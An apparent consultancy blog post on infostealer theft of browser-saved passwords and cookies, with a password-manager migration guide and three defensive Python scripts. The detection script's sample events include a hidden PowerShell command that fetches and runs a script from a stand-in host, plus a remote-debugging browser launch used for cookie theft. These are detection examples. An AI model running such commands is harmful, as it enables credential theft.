The Sunday Phone Call
The phone call goes the same way every time. An executive, usually a founder or a partner at a firm, has had something bad happen. Their email started sending things they did not write. Their bank flagged a wire. Their Microsoft 365 account is locked because someone in another country was logged in as them.
We start asking the boring questions. Where were the passwords? And the answer is always some version of the same thing: a few in Chrome, a few in Safari on the iPhone, a vault from 2019 that they half-use, a Note app with about thirty in it, and a spreadsheet from when they bought the business. They cannot tell you which one leaked because they cannot tell you what is in any of them.
That fragmentation is the real story. It is not that any one of those stores is uniquely terrible. It is that no one of them is the truth. When something goes wrong, you cannot scope the damage. You reset everything, badly, and hope you got the right ones.
The browser was never designed to be a vault. It was designed to be convenient. Those are different jobs, and treating them as the same is how the Sunday phone call happens.
The Threat is Routine, Not Theoretical
The reason browser-stored passwords are the weakest link in your stack right now has a name: infostealer malware. It is not exotic. It is not nation-state. It is commodity software, sold for a few hundred dollars on criminal marketplaces, and it does exactly one job — quietly open Chrome or Edge or Safari and walk out with everything you saved.
In the first half of 2025, infostealer malware harvested 1.8 billion credentials. That is an 800% jump over the prior six months. This is the most common way a working executive's account gets taken in 2026, and it almost never looks like a movie.
Here is what actually happens. You click a fake CAPTCHA, a poisoned ad, a "your invoice is attached" PDF, or a Google search result that drops a small program onto your machine. That program runs as you. It does not need to break Windows or Chrome. It copies the password database Chrome saved for you and decrypts it with the same key your own logged-in account is allowed to use (on Windows that is DPAPI, on a Mac the entry Chrome keeps in your login keychain), because anything running as you is allowed to ask for it. Then it uploads the contents. It also grabs your session cookies, which can be worse than passwords: replaying a live Microsoft 365 session cookie lets an attacker act as you with no password and no MFA prompt, because you already passed MFA when that session was created and the service only checks the cookie afterwards.
The whole thing finishes in seconds. No popup. No warning. Antivirus often does not catch it.
Three families dominate the 2026 landscape and are worth knowing by name. Lumma was disrupted by Microsoft, the FBI, and Europol in May 2025 (about 2,300 domains seized) and was back at scale within weeks. RedLine was knocked back by Operation Magnus in October 2024, but the stolen logs are still circulating. And then there is VoidStealer, identified in 2026, which specifically defeats Chrome's "Application-Bound Encryption" protection, the change Google shipped in Chrome 127 (mid-2024) to put the decryption key behind a privileged Chrome service so that a process merely running as you could no longer unwrap the saved-password and cookie stores. Google shipped a fix for this exact attack, and within about 18 months a piece of malware shipped that gets around it.
Browser vendors are in an arms race they are not winning consistently. The credential theft and the actual compromise are often weeks or months apart, which is part of why the attack surprises people. The Sunday call is usually about something stolen in March.
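The delivery chain and the cookie theft described above leave process-creation telemetry that a defender can match on. The following is an added example, not code from the original post or from any vendor. The two heuristics are the editor's own: a browser started with a remote-debugging switch, which lets another process ask the browser to hand over decrypted cookies and logins through the DevTools protocol, and a script host launched hidden with an encoded or remote payload, the shape of the paste-this-command fake-CAPTCHA lure. The Sysmon-style events are constructed, including the paths and the captcha-check.invalid URL.

```python
"""Detection over process-creation events (Sysmon Event ID 1 style), as an added example.
The heuristics are the editor's, not any vendor's rules, and the sample events are constructed."""
import re
from dataclasses import dataclass

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Chromium honours these switches. A stealer that starts the browser with them can pull
# cookies and logins through the DevTools protocol, with the browser doing the decryption
# for it, instead of attacking the encrypted files on disk.
DEBUG_FLAGS = ("--remote-debugging-port", "--remote-debugging-pipe", "--remote-allow-origins")

# Hidden window plus an encoded or remote payload is the shape of the "paste this to prove
# you are human" lure: the user runs the command via Win+R, so explorer.exe is the parent.
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
REMOTE_RE = re.compile(r"https?://", re.I)


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    command_line: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text: str) -> list[ProcEvent]:
    """Blank-line separated 'Key: value' blocks, the way Sysmon EventData reads when exported as text."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, _, value = line.partition(": ")
            fields[key.strip()] = value.strip()
        events.append(ProcEvent(fields["Image"], fields["ParentImage"], fields["CommandLine"]))
    return events


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every heuristic the event trips; empty list means clean."""
    hits = []
    name, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
    if name in BROWSERS and any(flag in cmd.lower() for flag in DEBUG_FLAGS):
        hits.append("browser-remote-debugging")
    if name in SCRIPT_HOSTS:
        if HIDDEN_RE.search(cmd) and (ENCODED_RE.search(cmd) or REMOTE_RE.search(cmd)):
            hits.append("hidden-script-host-payload")
        if parent == "explorer.exe" and REMOTE_RE.search(cmd):
            hits.append("script-host-from-explorer-with-url")
    return hits


def scan(text: str) -> list[tuple[str, list[str]]]:
    return [(basename(ev.image), classify(ev)) for ev in parse_events(text)]


# Constructed sample telemetry: two events that should fire, two that should not.
SAMPLE_EVENTS = r"""
Image: C:\Program Files\Google\Chrome\Application\chrome.exe
ParentImage: C:\Users\ceo\AppData\Local\Temp\update.exe
CommandLine: "chrome.exe" --headless --remote-debugging-port=9222 --user-data-dir="C:\Users\ceo\AppData\Local\Google\Chrome\User Data"

Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentImage: C:\Windows\explorer.exe
CommandLine: powershell -w hidden -c "iwr https://captcha-check.invalid/verify.ps1 | iex"

Image: C:\Program Files\Google\Chrome\Application\chrome.exe
ParentImage: C:\Windows\explorer.exe
CommandLine: "chrome.exe" --profile-directory=Default

Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentImage: C:\Users\ceo\AppData\Local\Microsoft\WindowsApps\wt.exe
CommandLine: powershell -NoLogo -c Get-Process
"""

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image:15} {hits or 'clean'}")
```

Run it and each sample prints as clean or with its hit names; in practice feed it Sysmon Event ID 1 or Windows 4688 data with command-line logging turned on. The remote-debugging rule also fires on developers who genuinely drive the browser from DevTools, so scope it to non-engineering machines or require the parent process to live outside the browser's own install directory.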
The Fragmentation Problem
Most executives have passwords in three to five places without realizing it. Chrome on a personal laptop. Safari and iCloud Keychain on the iPhone. Edge on a Windows work machine. A real password manager from 2019 that they half-use. And a Note, a Stickies pad, or a spreadsheet. Yes, still, in 2026.
The problem is concrete:
- You cannot scope an incident. When you ask "what passwords would an attacker get from my Mac?", you cannot actually answer it.
- You default to the weakest link. When the same login lives in three places and one auto-fills, you use that one. The least secure store wins.
- Recovery is brutal. Phone lost, account locked, laptop replaced — you do not know which store had the right password, so you reset everything badly.
- Sharing is impossible. Your assistant or your spouse needs the Comcast login. The browser cannot share it cleanly. So you text it. Now it is also in iMessage.
- You cannot audit. A real password manager will tell you "47 passwords reused, 12 in known breaches, 6 weak." Browsers do a partial version of this, inconsistently.
The fix is not to add a fifth place. The fix is to pick one vault, move everything into it, and delete the others.
The Decision — In One Table
There are four real options. Skip the prose. Find the row that looks like your life.
| If you are… | Pick | Cost |
|---|---|---|
| 100% Apple — Mac + iPhone, no work Windows machine | Apple Passwords / iCloud Keychain | Free |
| Mixed: Windows laptop + iPhone, or Mac + Android, or anything cross-OS | 1Password or Bitwarden | $48/yr or $10/yr |
| You + spouse + kids, want shared streaming and banking logins | 1Password Families | $72/yr for 5 people |
| Cost-sensitive, just need the basics | Bitwarden Free | $0 |
| Heavy Google user, accept the limits | Google Password Manager + on-device encryption | Free |
The honest "executive default" answer is 1Password. Not because it is magic. Because if you are cross-platform and your time is worth more than $4 a month, paying for the polished one removes the friction that makes people abandon password managers. Bitwarden is the cheaper, open-source alternative and it is genuinely fine — meaningfully less polished in the browser extension, but functionally on par. Wirecutter's 2026 pick is 1Password, and we agree.
Two things to know about the free options. Apple Passwords on Windows is noticeably degraded — no passkeys, no shared groups, no Wi-Fi password access — so if you have a Windows work laptop, you need a real cross-platform tool. And Google Password Manager's default encryption is not zero-knowledge unless you turn on On-Device Encryption, which most people never do. If you stay on Google's manager, that step is non-negotiable.
The LastPass Cautionary Tale
LastPass was the largest password manager in the world until its 2022 breach, in which attackers exfiltrated encrypted vaults and have been brute-forcing them for years. In March 2025, federal investigators linked roughly $150 million in cryptocurrency theft directly to vaults stolen in that 2022 breach.
The lesson is not "password managers are unsafe." The lesson is:
- The manager itself can be a target. Pick a vendor with a clean track record.
- Your master password being long and unique matters enormously, because if a vault is ever stolen, that password is the only thing standing between the attacker and your data.
- Your manager must have its own MFA enabled. Hardware key if you have one, authenticator app if you do not. Never SMS.
- We do not recommend LastPass.
The 90-Minute Migration
Realistic time end to end is 45 to 90 minutes. You will be in front of your laptop and phone the whole time. Do not try to do this between meetings.
- Pick the manager. Use the table. 1Password or Bitwarden if cross-platform. Apple Passwords if all-Apple. Move on.
- Create the account with a strong master password. 16 characters minimum. Use a passphrase of at least four words chosen at random (dice or the manager's generator, not words you picked yourself), not a complicated short string. Write it on physical paper and put it somewhere only you can access. This is the one password that cannot be in the cloud.
- Turn on MFA on the manager itself. This is the most-skipped step. Hardware key or authenticator app. Never SMS. The manager is now the keys to your life.
- Export from your browsers. Chrome at passwords.google.com → Settings → Download passwords. Edge: Settings → Profiles → Passwords → Export. Safari on Mac: Passwords app → File → Export. The CSV is plaintext — treat it like a loaded weapon.
- Import into your new manager. All the major ones accept the browser CSV format. Run the wizard.
- DELETE THE CSV. Now. Empty the trash; on Windows, Shift+Delete skips the Recycle Bin. If the folder you exported to syncs to OneDrive, iCloud Drive or Dropbox, a copy has already been uploaded, so delete it from that service's trash as well, or better, export to a folder that does not sync in the first place. The CSV is the largest single risk in this whole process: every password you own, in cleartext, on disk.
- Delete passwords from the browsers and turn off browser autofill. This is the step most people skip. If you skip it, you have added a tool, not solved the problem. Chrome: passwords.google.com → Settings → delete all saved passwords, while signed in with sync on so the deletion reaches the copy in your Google account and every other device (otherwise that copy syncs back later); then toggle OFF "Offer to save passwords." Edge: same shape, and the same warning applies to the copy in your Microsoft account. Safari: Passwords app → delete; Safari Settings → AutoFill → uncheck "User names and passwords." One exception: if your vault is Apple Passwords or Google Password Manager, leave that store alone. It is the vault now, and the point is that every other store ends up empty.
- Install the manager's browser extension. On every browser you actually use. The extension is what auto-fills now — not the browser.
- Run the manager's vault health report. 1Password calls this Watchtower. Bitwarden has Vault Health Reports. You will see something like "47 reused, 12 in known breaches, 6 weak." Spend 20 minutes fixing the worst ten — banks, primary email, Microsoft 365, Apple ID, anything financial. You do not have to fix them all today.
- Set up your phone. Install the app, sign in, turn on Face ID for unlock, set the manager as the default password fill provider. iPhone: Settings → General → AutoFill & Passwords. Android: Settings → Passwords & accounts → Password service.
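Steps 5 through 9 can be checked locally before anything leaves the machine: parse the export, find reused and short passwords, and ask the Pwned Passwords range API about them without ever sending the password itself. The block below is an added example, not the original post's or any vendor's code. The CSV rows are constructed, the header mapping for Chrome, Edge and Safari exports is the editor's, and the range response is a stand-in for the API built from the same hash so the match is exercised offline; in a real lookup only the first five hex characters of the SHA-1 go over the wire.

```python
"""Local audit of a browser password export (steps 5 to 9 above), as an added example.
The CSV is constructed, not a real export; the range response is a stand-in for the
Pwned Passwords API, whose k-anonymity lookup sends only the first five hex characters
of a SHA-1 and returns 'SUFFIX:COUNT' lines."""
import csv
import hashlib
import io
from collections import defaultdict

# Chrome writes name,url,username,password,note; Edge drops the note column;
# Safari writes Title,URL,Username,Password,Notes,OTPAuth. Headers are matched case-insensitively.
SAMPLE_CSV = """name,url,username,password,note
Bank,https://bank.example,ceo@example.com,Summer2019!,
Microsoft 365,https://login.microsoftonline.com,ceo@example.com,Summer2019!,
Comcast,https://xfinity.example,ceo@example.com,comcast1,shared with EA
Vault test,https://vault.example,ceo,correct-horse-battery-staple-2x,
"""


def load_export(text: str) -> list[dict]:
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        norm = {(k or "").strip().lower(): (v or "") for k, v in row.items()}
        rows.append({
            "name": norm.get("name") or norm.get("title", ""),
            "url": norm.get("url", ""),
            "username": norm.get("username", ""),
            "password": norm.get("password", ""),
        })
    return rows


def reuse_groups(rows: list[dict]) -> dict:
    """Passwords shared by more than one entry: one stealer log unlocks all of them."""
    by_pw = defaultdict(list)
    for r in rows:
        by_pw[r["password"]].append(r["name"])
    return {pw: names for pw, names in by_pw.items() if len(names) > 1}


def weak(rows: list[dict], min_len: int = 12) -> list[str]:
    return [r["name"] for r in rows if len(r["password"]) < min_len]


def hibp_range_query(password: str) -> tuple[str, str]:
    """Split SHA-1(password) into the 5-char prefix sent to the API and the suffix kept local."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def breached_in_range(password: str, range_body: str) -> int:
    """Match the local suffix against a range response; returns the breach count, 0 if absent."""
    _, suffix = hibp_range_query(password)
    for line in range_body.splitlines():
        s, _, count = line.strip().partition(":")
        if s == suffix:
            return int(count)
    return 0


# Constructed stand-in for the HTTP response, built from the same hash so the match is exercised.
_BREACHED_PREFIX, _BREACHED_SUFFIX = hibp_range_query("Summer2019!")
FAKE_RANGE = f"0018A45C4D1DEF81644B54AB7F969B88D65:3\n{_BREACHED_SUFFIX}:4513\n"


def offline_range_lookup(prefix: str) -> str:
    # A real lookup is urllib.request.urlopen(f"https://api.pwnedpasswords.com/range/{prefix}"),
    # optionally with an "Add-Padding: true" header for uniform response sizes; this stays offline.
    return FAKE_RANGE if prefix == _BREACHED_PREFIX else "0" * 34 + "A:1\n"


def audit(text: str, range_lookup=offline_range_lookup) -> dict:
    rows = load_export(text)
    breached = {}
    for r in rows:
        prefix, _ = hibp_range_query(r["password"])
        count = breached_in_range(r["password"], range_lookup(prefix))
        if count:
            breached[r["name"]] = count
    return {"reused": reuse_groups(rows), "weak": weak(rows), "breached": breached}


if __name__ == "__main__":
    for key, value in audit(SAMPLE_CSV).items():
        print(f"{key}: {value}")
```

Run the file directly to print the three lists for the sample. Because the script reads the cleartext CSV, run it from the folder the export sits in and then delete the CSV as step 6 says; the script keeps no copy.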
What "Done" Looks Like
You are done when six things are true:
- One password manager, with MFA on it.
- Browser autofill turned off.
- Browser password stores empty.
- Master password on physical paper in a safe place.
- Vault Health report run, top 10 weakest passwords rotated.
- Manager app installed on your phone, Face ID enabled.
If all six are true, you have removed yourself from roughly 90% of the threat model that produces "your account has been compromised" calls in 2026. Not all of it — phishing and session-cookie theft still exist — but the easiest, cheapest, most-automated attack is no longer effective against you.
That is the goal. Not perfection. Just being a harder target than the next person on the list.
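Two of the six items, empty browser stores and autofill off, can be verified rather than assumed on Chrome and Edge profiles. The following is an added example, not from the original post or from Google or Microsoft. It relies on two facts about Chromium profiles (saved logins live in the Login Data SQLite file, table logins; the save-passwords switch is the credentials_enable_service key in Preferences) and on constructed sample profiles with a reduced schema. The profile paths listed are the usual default locations and are an assumption for any non-default install; Safari and iCloud Keychain cannot be checked this way.

```python
"""Verify the 'browser password stores empty, save prompt off' items of the checklist above,
as an added example. Chrome and Edge only: both keep saved logins in <profile>/Login Data
(SQLite, table 'logins') and the "Offer to save passwords" switch in <profile>/Preferences
as credentials_enable_service. The sample profiles are constructed."""
import json
import shutil
import sqlite3
import tempfile
from pathlib import Path


def saved_login_count(profile_dir: Path) -> int:
    db = profile_dir / "Login Data"
    if not db.exists():
        return 0
    # The running browser holds the database locked; work on a copy.
    with tempfile.TemporaryDirectory() as tmp:
        copy = Path(tmp) / "Login Data"
        shutil.copy2(db, copy)
        con = sqlite3.connect(copy)
        try:
            (count,) = con.execute("SELECT COUNT(*) FROM logins").fetchone()
        finally:
            con.close()
    return count


def save_prompt_enabled(profile_dir: Path) -> bool:
    prefs = profile_dir / "Preferences"
    if not prefs.exists():
        return True  # Chromium's default is on; a missing key means it was never turned off
    data = json.loads(prefs.read_text(encoding="utf-8"))
    return bool(data.get("credentials_enable_service", True))


def check_profile(profile_dir: Path) -> dict:
    return {"saved_logins": saved_login_count(profile_dir),
            "save_prompt": save_prompt_enabled(profile_dir)}


def is_done(profile_dir: Path) -> bool:
    r = check_profile(profile_dir)
    return r["saved_logins"] == 0 and not r["save_prompt"]


def default_profile_dirs() -> list[Path]:
    """Default-profile locations for Chrome and Edge (assumed); extra profiles sit beside 'Default' as 'Profile N'."""
    home = Path.home()
    return [
        home / "AppData/Local/Google/Chrome/User Data/Default",
        home / "AppData/Local/Microsoft/Edge/User Data/Default",
        home / "Library/Application Support/Google/Chrome/Default",
        home / "Library/Application Support/Microsoft Edge/Default",
        home / ".config/google-chrome/Default",
        home / ".config/microsoft-edge/Default",
    ]


def make_sample_profile(root: Path, n_logins: int, prompt: bool) -> Path:
    """Constructed stand-in profile, reduced to the columns this check reads."""
    root.mkdir(parents=True, exist_ok=True)
    con = sqlite3.connect(root / "Login Data")
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    con.executemany("INSERT INTO logins VALUES (?, ?, ?)",
                    [(f"https://site{i}.example", "ceo", b"v10\x00opaque") for i in range(n_logins)])
    con.commit()
    con.close()
    (root / "Preferences").write_text(json.dumps({"credentials_enable_service": prompt}), encoding="utf-8")
    return root


def demo() -> tuple:
    """Before and after the migration, on constructed profiles."""
    with tempfile.TemporaryDirectory() as tmp:
        before = make_sample_profile(Path(tmp) / "before", 3, True)
        after = make_sample_profile(Path(tmp) / "after", 0, False)
        return check_profile(before), is_done(before), check_profile(after), is_done(after)


if __name__ == "__main__":
    print("sample:", demo())
    for profile in default_profile_dirs():
        if profile.exists():
            print(profile, check_profile(profile), "DONE" if is_done(profile) else "NOT DONE")
```

Run it on the machine after step 7: each default profile that exists prints DONE or NOT DONE. If you kept Google Password Manager as your vault, a non-zero count in Chrome is expected and the check only applies to Edge.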
Two Honest Objections
"What about passkeys? I keep hearing about passkeys." Passkeys are real and they are better. Apple Passwords, 1Password, Bitwarden, and Google Password Manager all support them. You do not have to choose between passwords and passkeys: your manager will store both. As more sites support passkeys (Google, Microsoft, Apple, Amazon, PayPal, eBay all do already), your manager will offer to save a passkey each time one of them prompts you to create one, and the site's password stays in the vault as the fallback. Picking a manager today is the prerequisite to using passkeys well tomorrow.
"My IT department manages this." For your work account, sometimes. For your personal email, your bank, your Costco login, your kid's pediatrician portal — no, they do not. Personal credential hygiene is on you. And if a personal account gets popped and the same password protects something at work, the line between "personal" and "work" stops mattering very quickly.
Not Sure Where Your Credentials Actually Live?
If your team needs help auditing where credentials are stored, what has been exposed in known breaches, and where the migration path goes, get in touch. Credential hygiene is one of the cheapest wins for posture improvement — and we will tell you the truth about what we find. No sales pitch.
Talk to CloudRaider